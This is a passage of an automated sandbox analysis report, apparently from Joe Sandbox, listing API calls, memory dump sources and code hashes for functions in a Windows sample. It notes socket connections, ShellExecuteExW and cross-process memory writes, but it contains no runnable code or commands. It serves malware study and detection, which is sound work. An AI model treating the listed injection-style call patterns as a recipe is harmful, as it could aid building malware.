                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03071B28,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03071B28,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 142311417-0
                                                                                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                    • _wcslen.LIBCMT ref: 004458FB
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3087257052-0
                                                                                                                    • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                    • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
• Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
• Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
• Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
• Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
• Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
• Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
APIs
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
• Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
• Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
• Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
• Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
• Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
• Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyWindow.USER32(?), ref: 00455728
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1042038666-0
                                                                                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
APIs
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
• Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
• Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
• Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
APIs
• __getptd.LIBCMT ref: 0041780F
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __getptd.LIBCMT ref: 00417826
• __amsg_exit.LIBCMT ref: 00417834
• __lock.LIBCMT ref: 00417844
• __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
• Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
• Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
• Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
APIs
  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
• ___set_flsgetvalue.LIBCMT ref: 00413D20
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 00413D2B
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 00413D3E
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
• ExitThread.KERNEL32 ref: 00413D4E
• GetCurrentThreadId.KERNEL32 ref: 00413D54
• __freefls@4.LIBCMT ref: 00413D74
Similarity
• API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 2403457894-0
• Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
• Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
• Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
• Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
APIs
  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
• ___set_flsgetvalue.LIBCMT ref: 004151C0
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 004151CB
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 004151DD
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
• ExitThread.KERNEL32 ref: 004151ED
• __freefls@4.LIBCMT ref: 00415209
Similarity
• API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 4247068974-0
• Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
• Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
• Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
• Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
Strings
Similarity
• API ID:
• String ID: )$U$\
• API String ID: 0-3705770531
• Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
• Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
• Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
• Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
APIs
  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
• CoInitialize.OLE32(00000000), ref: 0046E505
• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
• CoUninitialize.OLE32 ref: 0046E53D
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
• Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
APIs
Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                    Strings
                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 708495834-557222456
                                                                                                                    • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                    • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                    • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                    • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                      • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                      • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                      • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                      • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                    • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                    • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                    • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \$]$h
                                                                                                                    • API String ID: 4104443479-3262404753
                                                                                                                    • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                    • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                    • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                    • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                    APIs
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
